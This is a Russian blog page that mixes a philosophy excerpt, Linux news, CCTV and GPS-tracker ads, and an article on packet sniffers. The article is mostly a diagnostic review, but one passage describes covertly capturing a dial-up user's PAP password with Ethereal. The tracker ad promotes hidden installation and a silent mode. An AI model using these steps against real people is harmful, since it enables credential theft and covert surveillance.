...Вот причины, почтеннейшие отцы, которые не только вдохновляют, но увлекают меня на изучение философии. Конечно, я не говорил бы об этом, если бы не желал ответить как тем, кто имеет обыкновение осуждать изучение философии, в особенности выдающимися людьми, так и тем, кто вообще живет заурядной жизнью. Ведь в действительности изучение философии является несчастьем нашего времени, так как находится, скорее, в презрении и поругании, чем в почете и славе.

Губительное и чудовищное убеждение, что заниматься философией надлежит немногим, либо вообще не следует заниматься ею, поразило все умы. Никто не исследует причины вещей, движение природы, устройство вселенной, замыслы Бога, небесные и земные мистерии, если не может добиться какой-либо благодарности или получить какую-либо выгоду для себя. К сожалению, стало даже так, что учеными считают только тех, кто изучает науку за вознаграждение. Скромная Паллада, посланная к людям с дарами Богов, освистывается, порицается, изгоняется; нет никого, кто любил бы ее, кто бы ей покровительствовал, разве что сама, продаваясь и извлекая жалкое вознаграждение из оскверненной девственности, принесет добытые позором деньги в шкаф любимого. С огромной печалью я отмечаю, что в наше время не правители, а философы думают и заявляют, что не следует заниматься философией, так как философам не установлены ни вознаграждении, ни премии, как будто они не показали тем самым, что они не являются философами. И действительно, так как их жизнь проходит в поисках денег или славы, то они даже для самих себя не размышляют над истиной. Я не постыжусь похвалить себя за то, что никогда не занимался философией иначе, как из любви к философии, и ни в исследованиях, ни в размышлениях своих никогда не рассчитывал ни на какое вознаграждение или оплату, кроме как на формирование моей души и на понимание истины, к которой я страстно стремился. Это стремление было всегда столь страстным, что, отбросив заботу обо всех частных и общественных делах, я предавался покою размышления, и ни зависть недоброжелателей, ни хула врагов науки не смогли и не смогут отвлечь меня от этого. Именно философия научила меня зависеть скорее от собственного мнения, чем от чужих суждений, и всегда думать не о том, чтобы не услышать зла, но о том, чтобы не сказать или не сделать его самому.

Рубрики:  Познание

Метки:  

А вдруг будет использоваться Linux

Среда, 30 Сентября 2015 г. 00:08 + в цитатник

Линус Торвальдс считает самой безопасной ту ОС, которая отключена от сети

 
Двадцать четыре года назад финский разработчик Линус Торвальдс, который считается одним из самых влиятельных программистов, опубликовал исходный код Linux. Линус Торвальдс представил его, разместив сообщение в новостной сети Usenet, которое начиналось словами: «Я делаю бесплатную операционную систему (как хобби, она не будет такой большой и профессиональной как GNU)». С тех пор база кода, конечно же, расширилась — от 10 000 строк до миллионов, — и на этом работает сегодня практически всё: от планшетов и смартфонов до телевизоров и маршрутизаторов. Linux служит основой для операционной системы Android, и даже Microsoft анонсировала собственный дистрибутив Linux, несмотря на снятый давным давно шутливый ролик в стиле «Матрицы». Вообще Торвальдс редко даёт интервью, в основном по электронной почте и просит задавать не более пяти вопросов.

25 сентября 2015

Выпуск Beta 2 Ubuntu 15.10 и производных

 
Состоялся второй (финальный) бета-выпуск дистрибутива Ubuntu 15.10 "Wily Werewolf" и производных.
 Готовые установочные образы для тестового выпуска созданы для Ubuntu Desktop, Ubuntu Server и Ubuntu Core (для них на прошлых этапах тестирования предлагались только ежедневные сборки), а также для Kubuntu, Lubuntu, Ubuntu MATE, Ubuntu Cloud, Ubuntu GNOME, Xubuntu и Ubuntu Kylin.
Релиз намечен на 22 октября.

24 сентября 2015

В Индии развивают собственную сборку Debian/Linux для замены Windows в госучреждениях

 
  Индийский Центр разработки расширенных компьютерных технологий, созданный по инициативе правительства Индии, c 2007 года развивает собственный Linux-дистрибутив BOSS (Bharat Operating System Solutions), представляющий собой адаптированную для местного применения сборку Debian GNU/Linux. Представленный в этом году выпуск BOSS 6.1, основанный на пакетной базе Debian 8 "Jessie" и оснащённый рабочим столом на основе GNOME 3.14, одобрен для внедрения в государственных учреждениях Индии в рамках программы по замене Windows на собственную подконтрольную программную платформу. На новую ОС планируется перевести все официальные государственные компьютерные системы, в настоящее время оснащённые Windows. Первым к миграции приступило Министерство внутренних дел Индии.

23 сентября 2015

Выпуск дистрибутива Tails 1.6

 
Представлен релиз специализированного дистрибутива Tails (The Amnesic Incognito Live System) 1.6, основанного на пакетной базе Debian и предназначенного для обеспечения анонимного выхода в сеть. Для загрузки подготовлен iso-образ, способный работать в Live-режиме, размером 941 Мб.

22 сентября 2015

Установить/обновить ядро Linux Kernel 4.2.1 в Ubuntu и производные

 
Предупреждение. Ядро Linux является критичным элементом системы. Обновления ядра могут содержать улучшения аппаратной поддержки или устранять уязвимости.  Делать обновление стоит когда одно из аппаратных устройств работает некорректно, а новое ядро может решить данную проблему.  Но в тоже время установка нового ядра без особой необходимости может привести к нежелательным регрессиям, таким как: отсутствие подключения к сети, отсутствие звука или даже невозможность загрузить систему, поэтому устанавливайте новое ядро на свой страх и риск.

Установить/обновить ядро Linux Kernel 4.1.8 в Ubuntu и производные

 
Предупреждение. Ядро Linux является критичным элементом системы. Обновления ядра могут содержать улучшения аппаратной поддержки или устранять уязвимости.  Делать обновление стоит когда одно из аппаратных устройств работает некорректно, а новое ядро может решить данную проблему.  Но в тоже время установка нового ядра без особой необходимости может привести к нежелательным регрессиям, таким как: отсутствие подключения к сети, отсутствие звука или даже невозможность загрузить систему, поэтому устанавливайте новое ядро на свой страх и риск.

21 сентября 2015

Skype вышел из строя по всему миру

 
 Сегодня (21.09.15) популярный онлайн-мессенджер Skype вышел из строя по всему миру. Как сообщается в блоге Skype, "некоторые из вас могут испытывать проблемы со Скайпом и могут не видеть онлайн-статусы". Компания приносит извинения за причиненные неудобства и обещает сообщить, когда проблемы разрешатся.

20 сентября 2015

Выпуск драйвера AMD Catalyst 15.9 для Linux

 
Компания AMD опубликовала новую версию проприетарного драйвера AMD Catalyst 15.9. В новом выпуске отмечаются только исправления ошибок, в том числе решены проблемы с установкой в Ubuntu 14.04.3, устранены падения и нарушения отображения, проявляющиеся при использовании игр Company of Heroes 2, Middle-earth: Shadow of Mordor, DIRT Showdown и DOTA 2.
Драйвер поддерживает X-Server 1.17, ядро Linux 3.19 и glibc 2.3.

Установить плоскую тему Flatabulous и значки Ultra Flat Icon в Ubuntu

 
Тема Flatabulous - это новая плоская тема, разработанная индийским студентом института информационных технологий Anmol Jagetia специально для окружения Unity (Ubuntu), в стиле последней MacOS X Yosemite.
Тема Flatabulous будет прекрасно сочетаться с плоскими значками Ultra Flat Icon.

19 сентября 2015

Microsoft теперь на Linux

 

Компания Microsoft переходит на использование операционной системы на базе ядра Linux в своих дата-центрах. Собственная серверная ОС получила название Azure Cloud Switch (ACS) и является кросс-платформенной модульной системой.

Рубрики:  Программное обеспечение

Метки:  

Видео через Интернет

Вторник, 29 Сентября 2015 г. 11:01 + в цитатник

Видео через Интернет

Техническая служба Группы охранных предприятий «Восток» ( ЧОП ) предлагает новую программу «Видео через Интернет», позволяющую из любой точки мира 24 часа в сутки 365 дней в году получать изображение с любых видеокамер как в режиме онлайн, так и в записи.

Использование систем видеонаблюдения практикуется на протяжении многих лет, однако в наши дни развитие техники, сетевых технологий и распространение сети Интернет позволило вывести их на качественно иной уровень. Современные комплексы видеонаблюдения отличаются максимально возможной эффективностью при невысоких финансовых затратах на внедрение. При этом установка видеокамер и прочего специализированного оборудования гарантирует Заказчикам решение любых поставленных задач с учетом индивидуальных особенностей каждого проекта.


Суть программы «Видео через Интернет» заключается в следующем:

  • наши специалисты подберут, установят систему видеонаблюдения с возможностью записи и удаленного подключения к системе через глобальную сеть Интернет на любом объекте Заказчика (квартира, офис, предприятие), осуществят настройку IP соединений, отладку корректной работы оборудования

  • оборудование предоставляется Торговым домом «ВОСТОК» по минимальным ценам или передается Заказчику в аренду на условии ежемесячной абонентской платы

  • в процессе самостоятельной эксплуатации Заказчиком системы техническое обслуживание установленного оборудования осуществляется бесплатно на протяжении 24 мес. со дня монтажа системы видеонаблюдения или в рамках абонентского договора бессрочно

Во многом именно благодаря своей универсальности видеонаблюдение через Интернет пользуется огромной популярностью при построении комплексных систем безопасности. Объясняется это и тем, что с помощью одних и тех же аппаратных средств можно организовать как видеонаблюдение за няней в отсутствие родителей, так и позаботиться о сохранности имущества и информации большого корпоративного офиса.


Почему смоляне становятся абонентами программы «Видео через Интернет»?


  • Мера предосторожности от нападения

    Установка видеонаблюдения – это не прихоть или роскошь, а необходимая мера в современных условиях, когда уровень преступности высок. Возможно, сегодня злоумышленники пройдут мимо, выбирая другой объект для вандализма и иной источник наживы. Но неизвестно, кто окажется среди пострадавших в криминальной хронике завтра.


  • Cохранить ваше имущество

    Монтаж видеонаблюдения – это задача первостепенной важности, если вам удалось достичь успеха в жизни и приобрести материальные ценности, которые могут стать предметом элементарной зависти для менее успешных сограждан. Вы годами трудились, чтобы ваше предприятие процветало, но некоторые не готовы вкладывать столько времени и усилий. Они хотят получить все сразу и за чужой счет. Установка систем видеонаблюдения предотвратит неприятные последствия. Мы поможем вам защитить ваше предприятие, офис, коттедж, чтобы вам не пришлось начинать дело с нуля.


  • Обрести спокойствие

    Установка видеонаблюдения не потребует больших затрат благодаря нашим умеренным расценкам на монтаж систем видеонаблюдения, но спокойствие, которое вы получите взамен, не сравнимо ни с чем. Можете себе представить человека, который постоянно переживает, все ли у него в порядке? Каждый человек с высоким уровнем доходов неминуемо столкнется с ситуацией, когда приобретенные объекты недвижимости и другое материальное имущество будут нуждаться в более высоком уровне защиты.


  • Контролировать ситуацию

    Установка систем видеонаблюдения поможет вам не только обрести спокойствие. Вы будете твердо знать, что все в вашей жизни под контролем. Разве не к этому стремится каждый человек? Контроль над всеми сферами жизни придает Вам уверенности в себе и Вы, не оглядываясь, смело идете вперед. Зачем трудиться весь день напролет, если Вы не в состоянии потом сохранить результаты своего труда?


  • Избавиться от подозрений

    Но иногда установка систем видеонаблюдения нужна не только для того, чтобы защитить нас от внешних посягательств. Временами такие вещи необходимы, чтобы защитить нас от нас самих. Пусть будет под присмотром няня, которая сидит с Вашим малышом. Лучше твердо знать, что в Ваше отсутствие все сделано правильно, чем впоследствии кого-либо подозревать. Профессиональные няни и приходящие работники отнюдь не против таких мер. Наоборот, чувствуют себя более защищенными. Никто не обвинит их без веских на то причин. Хозяева имеют обыкновение терять вещи, забывать, куда их положили, иногда дорогие вещицы могут закатиться под диван. Установка видеонаблюдения избавит от необоснованных подозрений, Вы будете знать наверняка, что никто не виноват в исчезновении ценной фамильной реликвии, кроме Вас самих. Пусть видеотехника охраняет не только Ваше имущество, но и теплые отношения с людьми, которые служат Вам верой и правдой. Вы, тем временем, сможете сконцентрироваться на более важных задачах, не беспокоясь об охране материальных ценностей.


  • Cэкономить деньги и получить бесплатное обслуживание

    Заказчик, воспользовавшийся услугами Группы охранных предприятий «Восток» ( ЧОП ) по установке системы видеонаблюдения в рамках программы «Видео через Интернет», получает оборудование по минимальным ценам и бесплатное техническое обслуживание на 24 мес. или в рамках абонентского договора бессрочно.



Преимущества интернет-видеонаблюдения

Теперь несколько слов о том, какие преимущества получают Заказчики при использовании современных средств безопасности. Системы видеонаблюдения через Интернет дают людям возможность отслеживать ситуацию на подконтрольных объектах в режиме реального времени. Управление, настройка и контроль над работой системы производятся удаленно из любой точки мира. При этом могут использоваться не только стационарные компьютеры, но и КПК, коммуникаторы, ноутбуки, а в ряде случаев и мобильные телефоны. Кроме того, организация видеонаблюдения через Интернет не имеет никаких ограничений по количеству и типу используемого оборудования. В любой момент вы можете изменить количество видеокамер, способы записи и хранения информации, методику доставки уведомлений и многое-многое другое. По сути дела, только видеонаблюдение через Интернет способно дать человеку стопроцентные гарантии контроля над ситуацией вне зависимости от того, где он находится в текущий момент времени.

Коль скоро мы заговорили об аппаратном обеспечении, то давайте более подробно рассмотрим вопрос о том, как именно работают системы видеонаблюдения через Интернет. Разумеется, в первую очередь необходимо наличие точки доступа к мировой сети в месте проведения установочных работ. Это главное условие для нормального функционирования всей системы. Кроме того, крайне желательно позаботиться о приобретении выделенного IP адреса, благо соответствующая услуга провайдеров стоит совсем недорого. Дальнейшие действия при монтаже оборудования зависят от текущих потребностей клиентов. Можно выделить несколько самых распространенных схем установки.




Варианты организации системы наблюдения

Если в локальной сети присутствует только одна видеокамера и доступ в Интернет не требуется никакому другому оборудованию , то IP-адрес можно назначить непосредственно камере. Таким образом, происходит прямое подключение следящей аппаратуры к сети Интернет, и пользователи могут получать «картинку» с камеры, просто набрав соответствующий IP-адрес в строке браузера. Такая схема работы является идеальным вариантом в том случае, если требуется организовать видеонаблюдение дома или небольшого офисного помещения;

Если в локальной сети планируется установка нескольких камер или же доступ в Интернет требуется другому оборудованию, то придется позаботиться о приобретении маршрутизатора (роутера). При таком варианте выделенный IP-адрес назначается не конкретной видеокамере, а этому устройству (роутеру), который станет своеобразным мостиком между сетью Интернет и узлами локальной сети. При получении запросов пользователей маршрутизатор перенаправляет их на конкретное оборудование системы безопасности, давая возможность получать информацию с нескольких камер одновременно. Видеонаблюдение через Интернет с использованием маршрутизатора является оптимальным выбором в тех случаях, когда требуется контролировать ситуацию сразу в нескольких помещениях квартиры, офиса или магазина.

Если организация видеонаблюдения через Интернет предполагает не только получение изображения с камер, но и запись всех происходящих событий с последующим хранением информации, то появляется необходимость использовать видеорегистраторы. Следует сразу отметить, что при соблюдении ряда условий видеорегистратор может не только фиксировать события и вести архив записей, но и выполнять функции маршрутизатора, т.е. непосредственно видеорегистратор подключается к сети Интернет и ему присваивается IP-адрес, выданный провайдером. При этом все следящие камеры подключаются непосредственно к этому записывающему устройству, которое и управляет их работой, обрабатывая внешние и внутренние запросы пользователей. Ситуация осложняется при наличии в сети двух и более видеорегистраторов или же аппаратуры, которая использует для выхода в Интернет общую точку доступа. В данном случае целесообразно использовать все-таки отдельный роутер, который будет связующим узлом между глобальной сетью и каждым элементом в рамках локальной сети.

Рубрики:  Информационная безопасность
Информационная безопасность ОС Windows
Слежение, прослушка, мониторинг

Метки:  

GPS МАЯК (маячок, трекер, маркер, закладка)

Вторник, 29 Сентября 2015 г. 10:54 + в цитатник

Трекер GPS маяк 001 (Код: PM01)

Старая цена 5490 RUB
Цена: 4990 RUB


Портативный, автономный, миниатюрный спутниковый охранно-поисковый комплекс, предназначенный для точного определения местоположения и передачи гео-координат владельцу по каналам связи GSM (сообщения SMS и GPRS). GPS Маяк способен определять свои координаты не только по спутникам GPS и ГЛОНАС, но и с помощью GSM сети (по базовым станциям).  

Высокочувствительный 99 канальный GPS/Глонасс приемник, что значительно повышает надежность и точность определения координат, микропотребляющий процессор от производителя процессоров для iPhone (потребление 1мкА в режиме сна), надежный GSM модем разработанный для условий суровой Российской зимы (гарантированная работа от -40С до +85С), сверхчувствтительный микрофон, 3-х осевой цифровой акселерометр высокой чувствительности.

Малый размер и автономное питание позволяют скрытно установить GPS маячок в автомобиле, мотоцикле, а также в любом объекте, который необходимо контролировать (например, груз, багаж и т.п.). Наличие тревожной кнопки и небольшой вес позволяют использовать GPS маяк в качестве системы персональной охраны не только Ваших любимых и близких людей, но и Ваших домашних питомцев.

Комплектация:

  • Само устройство (7см х4,5см х1,5см)
  • Батарейки 2 шт (CR123)
  • Инструкция на русском языке
  • Коробка
  • Гарантийный талон.

Подробное описание:

Устройство обладает следующими возможностями: 99 канальный GPS/Глонасс приемник, что значительно повышает надежность и точность определения координат Вашего объекта. Для удобства обслуживания устройства обновление прошивки происходит через GPRS канал связи, что делает обновление прошивки простым делом и не требует специальных проводов или прошивальщика. Благодаря новым прошивкам Мы добавляем в них новые функции к устройству и устраняем замеченные ошибки в работе устройств.

Автоматический контроль баланса, автоматическая установка настроек доступа в интернет, при смене СИМ карты, автономная работа до 3-х лет и более, автоматическое оповещение о низком заряде батарей, датчик начала движения с настройкой чувствительности, датчик аварии, удара, температуры, переворота, тревожная кнопка (SOS), продуманная, естественная система команд не требующая запоминания кодов, цифровых последовательностей (например, команда установки первого будильника выглядит так: будильник1=10:00). 9 встроенных будильников, контроль выхода за заданный радиус (геозону), контроль максимальной скорости объекта, 4 режима отображения координат: google карты, yandex карты, широта-долгота, удаленность и направление от ближайшего города , возможность настройки через СМС, программу конфигуратор, мониторинговый сервер, свой бесплатный мониторинговый сервер, а также работа с другими популярными бесплатными серверами мониторинга автотранспорта.

4 предустановленных режима работы: ОХРАНА – для охраны транспорта и объектов ; СОН – самый экономичный режим для длительной автономной работы ; ПОИСК – для поиска украденного имущества ; ЖДУ – режим невидимка с ожиданием команд пользователя. Открытый GPRS протокол, что облегчает встраивание GPS Маркера в уже существующие мониторинговые системы

Трекер GPS маяк 001 Трекер GPS маяк 001 Трекер GPS маяк 001
 
   
 
Рубрики:  Автомобиль
Всё про автомобили, особенно про Шкода Фабия.
Информационная безопасность
Информационная безопасность ОС Windows

Метки:  

Что такое сканирование портов?

Понедельник, 28 Сентября 2015 г. 23:33 + в цитатник
Рубрики:  Программное обеспечение
Информационная безопасность
Информационная безопасность ОС Windows

Анализаторы сетевых пакетов

Понедельник, 28 Сентября 2015 г. 22:07 + в цитатник

Анализаторы сетевых пакетов

Сергей Пахомов

Принципы работы пакетных снифферов

Ограничения использования снифферов

Обзор программных пакетных снифферов

   Ethereal 0.10.14

   Analyzer v.2.2

   CommView 5.0

   Iris Network Traffic Analyzer4.07

 

Анализаторы сетевых пакетов, или снифферы, первоначально были разработаны как средство решения сетевых проблем. Они умеют перехватывать, интерпретировать и сохранять для последующего анализа пакеты, передаваемые по сети. С одной стороны, это позволяет системным администраторам и инженерам службы технической поддержки наблюдать за тем, как данные передаются по сети, диагностировать и устранять возникающие проблемы. В этом смысле пакетные снифферы представляют собой мощный инструмент диагностики сетевых проблем. С другой стороны, подобно многим другим мощным средствам, изначально предназначавшимся для администрирования, с течением времени снифферы стали применяться абсолютно для других целей. Действительно, сниффер в руках злоумышленника представляет собой довольно опасное средство и может использоваться для завладения паролями и другой конфиденциальной информацией. Однако не стоит думать, что снифферы — это некий магический инструмент, посредством которого любой хакер сможет легко просматривать конфиденциальную информацию, передаваемую по сети. И прежде чем доказать, что опасность, исходящая от снифферов, не столь велика, как нередко преподносят, рассмотрим более детально принципы их функционирования.

Принципы работы пакетных снифферов

В дальнейшем в рамках данной статьи мы будем рассматривать только программные снифферы, предназначенные для сетей Ethernet. Сниффер — это программа, которая работает на уровне сетевого адаптера NIC (Network Interface Card) (канальный уровень) и скрытым образом перехватывает весь трафик. Поскольку снифферы работают на канальном уровне модели OSI, они не должны играть по правилам протоколов более высокого уровня. Снифферы обходят механизмы фильтрации (адреса, порты и т.д.), которые драйверы Ethernet и стек TCP/IP используют для интерпретации данных. Пакетные снифферы захватывают из провода все, что по нему приходит. Снифферы могут сохранять кадры в двоичном формате и позже расшифровывать их, чтобы раскрыть информацию более высокого уровня, спрятанную внутри (рис. 1).

 

Рис. 1. Схема работы сниффера

Рис. 1. Схема работы сниффера

Для того чтобы сниффер мог перехватывать все пакеты, проходящие через сетевой адаптер, драйвер сетевого адаптера должен поддерживать режим функционирования promiscuous mode (беспорядочный режим). Именно в этом режиме работы сетевого адаптера сниффер способен перехватывать все пакеты. Данный режим работы сетевого адаптера автоматически активизируется при запуске сниффера или устанавливается вручную соответствующими настройками сниффера.

Весь перехваченный трафик передается декодеру пакетов, который идентифицирует и расщепляет пакеты по соответствующим уровням иерархии. В зависимости от возможностей конкретного сниффера представленная информация о пакетах может впоследствии дополнительно анализироваться и отфильтровываться.

В начало В начало

Ограничения использования снифферов

Наибольшую опасность снифферы представляли в те времена, когда информация передавалась по сети в открытом виде (без шифрования), а локальные сети строились на основе концентраторов (хабов). Однако эти времена безвозвратно ушли, и в настоящее время использование снифферов для получения доступа к конфиденциальной информации — задача отнюдь не из простых.

Дело в том, что при построении локальных сетей на основе концентраторов существует некая общая среда передачи данных (сетевой кабель) и все узлы сети обмениваются пакетами, конкурируя за доступ к этой среде (рис. 2), причем пакет, посылаемый одним узлом сети, передается на все порты концентратора и этот пакет прослушивают все остальные узлы сети, но принимает его только тот узел, которому он адресован. При этом если на одном из узлов сети установлен пакетный сниффер, то он может перехватывать все сетевые пакеты, относящиеся к данному сегменту сети (сети, образованной концентратором).

 

Рис. 2. При использовании концентраторов сниффер способен перехватывать все пакеты сетевого сегмента

Рис. 2. При использовании концентраторов сниффер способен перехватывать все пакеты сетевого сегмента

Коммутаторы являются более интеллектуальными устройствами, чем широковещательные концентраторы, и изолируют сетевой трафик. Коммутатор знает адреса устройств, подключенных к каждому порту, и передает пакеты только между нужными портами. Это позволяет разгрузить другие порты, не передавая на них каждый пакет, как это делает концентратор. Таким образом, посланный неким узлом сети пакет передается только на тот порт коммутатора, к которому подключен получатель пакета, а все остальные узлы сети не имеют возможности обнаружить данный пакет (рис. 3).

 

Рис. 3. При использовании коммутаторов сниффер способен перехватывать только входящие и исходящие пакеты одного узла сети

Рис. 3. При использовании коммутаторов сниффер способен перехватывать только входящие и исходящие пакеты одного узла сети

Поэтому если сеть построена на основе коммутатора, то сниффер, установленный на одном из компьютеров сети, способен перехватывать только те пакеты, которыми обменивается данный компьютер с другими узлами сети. В результате, чтобы иметь возможность перехватывать пакеты, которыми интересующий злоумышленника компьютер или сервер обменивается с остальными узлами сети, необходимо установить сниффер именно на этом компьютере (сервере), что на самом деле не так-то просто. Правда, следует иметь в виду, что некоторые пакетные снифферы запускаются из командной строки и могут не иметь графического интерфейса. Такие снифферы, в принципе, можно устанавливать и запускать удаленно и незаметно для пользователя.

Кроме того, необходимо также иметь в виду, что, хотя коммутаторы изолируют сетевой трафик, все управляемые коммутаторы имеют функцию перенаправления или зеркалирования портов. То есть порт коммутатора можно настроить таким образом, чтобы на него дублировались все пакеты, приходящие на другие порты коммутатора. Если в этом случае к такому порту подключен компьютер с пакетным сниффером, то он может перехватывать все пакеты, которыми обмениваются компьютеры в данном сетевом сегменте. Однако, как правило, возможность конфигурирования коммутатора доступна только сетевому администратору. Это, конечно, не означает, что он не может быть злоумышленником, но у сетевого администратора существует множество других способов контролировать всех пользователей локальной сети, и вряд ли он будет следить за вами столь изощренным способом.

Другая причина, по которой снифферы перестали быть настолько опасными, как раньше, заключается в том, что в настоящее время наиболее важные данные передаются в зашифрованном виде. Открытые, незашифрованные службы быстро исчезают из Интернета. К примеру, при посещении web-сайтов все чаще используется протокол SSL (Secure Sockets Layer); вместо открытого FTP используется SFTP (Secure FTP), а для других служб, которые не применяют шифрование по умолчанию, все чаще используются виртуальные частные сети (VPN).

Итак, те, кто беспокоится о возможности злонамеренного применения пакетных снифферов, должны иметь в виду следующее. Во-первых, чтобы представлять серьезную угрозу для вашей сети, снифферы должны находиться внутри самой сети. Во-вторых, сегодняшние стандарты шифрования чрезвычайно затрудняют процесс перехвата конфиденциальной информации. Поэтому в настоящее время пакетные снифферы постепенно утрачивают свою актуальность в качестве инструментов хакеров, но в то же время остаются действенным и мощным средством для диагностирования сетей. Более того, снифферы могут с успехом использоваться не только для диагностики и локализации сетевых проблем, но и для аудита сетевой безопасности. В частности, применение пакетных анализаторов позволяет обнаружить несанкционированный трафик, обнаружить и идентифицировать несанкционированное программное обеспечение, идентифицировать неиспользуемые протоколы для удаления их из сети, осуществлять генерацию трафика для испытания на вторжение (penetration test) с целью проверки системы защиты, работать с системами обнаружения вторжений (Intrusion Detection System, IDS).

В начало В начало

Обзор программных пакетных снифферов

Все программные снифферы можно условно разделить на две категории: снифферы, поддерживающие запуск из командной строки, и снифферы, имеющие графический интерфейс. При этом отметим, что существуют снифферы, которые объединяют в себе обе эти возможности. Кроме того, снифферы отличаются друг от друга протоколами, которые они поддерживают, глубиной анализа перехваченных пакетов, возможностями по настройке фильтров, а также возможностью совместимости с другими программами.

Обычно окно любого сниффера с графическим интерфейсом состоит их трех областей. В первой из них отображаются итоговые данные перехваченных пакетов. Обычно в этой области отображается минимум полей, а именно: время перехвата пакета; IP-адреса отправителя и получателя пакета; MAC-адреса отправителя и получателя пакета, исходные и целевые адреса портов; тип протокола (сетевой, транспортный или прикладного уровня); некоторая суммарная информация о перехваченных данных. Во второй области выводится статистическая информация об отдельном выбранном пакете, и, наконец, в третьей области пакет представлен в шестнадцатеричном виде или в символьной форме — ASCII.

Практически все пакетные снифферы позволяют производить анализ декодированных пакетов (именно поэтому пакетные снифферы также называют пакетными анализаторами, или протокольными анализаторами). Сниффер распределяет перехваченные пакеты по уровням и протоколам. Некоторые анализаторы пакетов способны распознавать протокол и отображать перехваченную информацию. Этот тип информации обычно отображается во второй области окна сниффера. К примеру, любой сниффер способен распознавать протокол TCP, а продвинутые снифферы умеют определять, каким приложением порожден данный трафик. Большинство анализаторов протоколов распознают свыше 500 различных протоколов и умеют описывать и декодировать их по именам. Чем больше информации в состоянии декодировать и представить на экране сниффер, тем меньше придется декодировать вручную.

Одна из проблем, с которой могут сталкиваться анализаторы пакетов, — невозможность корректной идентификации протокола, использующего порт, отличный от порта по умолчанию. К примеру, с целью повышения безопасности некоторые известные приложения могут настраиваться на применение портов, отличных от портов по умолчанию. Так, вместо традиционного порта 80, зарезервированного для web-сервера, данный сервер можно принудительно перенастроить на порт 8088 или на любой другой. Некоторые анализаторы пакетов в подобной ситуации не способны корректно определить протокол и отображают лишь информацию о протоколе нижнего уровня (TCP или UDP).

Существуют программные снифферы, к которым в качестве плагинов или встроенных модулей прилагаются программные аналитические модули, позволяющие создавать отчеты с полезной аналитической информацией о перехваченном трафике.

Другая характерная черта большинства программных анализаторов пакетов — возможность настройки фильтров до и после захвата трафика. Фильтры выделяют из общего трафика определенные пакеты по заданному критерию, что позволяет при анализе трафика избавиться от лишней информации.

Далее мы рассмотрим возможности нескольких доступных для скачивания снифферов, которые ориентированы на использование с платформами Windows.

Ethereal 0.10.14

Пакетный сниффер Ethereal 0.10.14 (www.ethereal.com) является, пожалуй, одним из лучших и поистине легендарных некоммерческих (а значит, бесплатных) пакетных анализаторов. Этот сниффер изначально был создан под Linux-платформы и основывался на базе утилиты Libpcap. Впоследствии появилась Windows-версия сниффера Ethereal, которая основывалась на базе утилиты WinPcap (Windows-версия Libpcap).

Утилита WinPcap (www.winpcap.org) представляет собой стандартный инструмент, посредством которого Windows-приложения могут непосредственно получать доступ к сетевому адаптеру (NIC-уровню) и перехватывать сетевые пакеты. Кроме того, драйвер WinPcap имеет дополнительные функциональные возможности, заключающиеся в фильтрации пакетов, сборе сетевой статистики и поддержке возможности удаленного перехвата пакетов.

В состав утилиты WinPcap входит драйвер, обеспечивающий взаимодействие с NIC-уровнем, и библиотека, отвечающая за взаимодействие с интерфейсом API.

Сниффер Ethereal 0.10.14 поставляется в комплекте с утилитой WinPcap 3.1, однако с сайта www.winpcap.org можно скачать версию WinPcap 3.2 alpha 1.

Несмотря на то что графический интерфейс утилиты Ethereal 0.10.14 достаточно понятен, к программе прилагается очень подробный учебник (более 200 страниц).

Ethereal 0.10.14 — один из немногих снифферов, который поддерживает как графический интерфейс, так и запуск из командной строки, что удобно при составлении сценариев или активизации функций перехвата пакетов в случае возникновения в сети определенных событий.

Функциональные возможности пакета Ethereal 0.10.14 очень обширны и выходят далеко за рамки обычных возможностей других пакетных снифферов.

В пакете Ethereal 0.10.14 встречаются практически все функции, которые только могут быть у анализатора пакетов. Программа может декодировать 752 протокола и поддерживает работу в Wi-Fi-сетях.

Графический интерфейс пакета Ethereal 0.10.14 вполне традиционен и содержит три области: отображения перехваченных пакетов, отображения статистической информации о конкретном выбранном пакете, содержимого конкретного пакета (рис. 4).

 

Рис. 4. Главное окно программы Ethereal 0.10.14

Рис. 4. Главное окно программы Ethereal 0.10.14

Графический интерфейс программы Ethereal облегчает создание пакетных фильтров как для файлов перехваченных пакетов (фильтры отображения), так и для «живого» перехвата (фильтры перехвата). После изучения синтаксиса фильтров программы Ethereal можно создавать фильтры самостоятельно, присваивать им имена и сохранять их для последующего использования (рис. 5). Программа Ethereal обладает довольно удобным интерфейсом для создания фильтров. Достаточно нажать на кнопку Add Expression, чтобы создать фильтры в диалоговом окне Filter Expression.

 

Рис. 5. Создание фильтра в программе

Рис. 5. Создание фильтра в программе Ethereal 0.10.14

Стоит отметить, что программа Ethereal обладает очень гибкими возможностями по созданию фильтров. Программа способна осуществлять фильтрацию практически по любой характеристике пакета и по любому значению этой характеристики. Кроме того, фильтры можно комбинировать друг с другом с использованием булевых операторов AND и OR.

Применение фильтров в анализаторе Ethereal позволяет легко выделить из общего потока перехваченной информации именно те или даже тот единственный кадр, который требуется. Рассмотрим, к примеру, как найти при помощи фильтра пакет с паролем при подключении пользователя к Интернету через dial-up-соединение.

Прежде всего запускаем сниффер (это можно сделать и из командной строки, причем удаленно и незаметно для пользователя) и накапливаем информацию до тех пор, пока пользователь не установит соединение с Интернетом.

Далее необходимо настроить фильтр, позволяющий найти нужный пакет. Поскольку процесс аутентификации пользователя проходит по протоколу PPP PAP, необходимо создать фильтр на выделение этого протокола. Для этого в строке выражения достаточно указать «pap» и присвоить имя новому фильтру (например, DialUp_Password) (рис. 6).

 

Рис. 6. Настройка фильтра для получения пакета с паролем

Рис. 6. Настройка фильтра для получения пакета с паролем

После применения фильтра из всей совокупности пакетов останутся только два: пакет-запрос на аутентификацию (Authenticate-Request) и пакет подтверждения аутентификации (Authenticate-ACK). Понятно, что пароль (как правило, он передается провайдеру в незашифрованном виде) содержится в первом пакете, в чем несложно убедиться, просмотрев содержимое самого пакета (рис. 7).

 

Рис. 7. Содержимое пакета

Рис. 7. Содержимое пакета

Еще один пример эффективного использования программы Ethereal 0.10.14 в мирных целях — это точная настройка размера TCP-окна. Чтобы оптимальным образом настроить размер TCP-окна, необходимо запустить сниффер в процессе скачивания файла по сети и затем, настроив соответствующим образом фильтр, просмотреть количество запросов на повторную передачу пакетов, количество пакетов-подтверждений и ошибочных пакетов. Манипулируя с размером TCP-окна, можно добиться максимально возможной скорости передачи, снизив количество подтверждений при хорошем качестве связи или уменьшив число запросов на повторную передачу, — при не очень хорошем качестве связи.

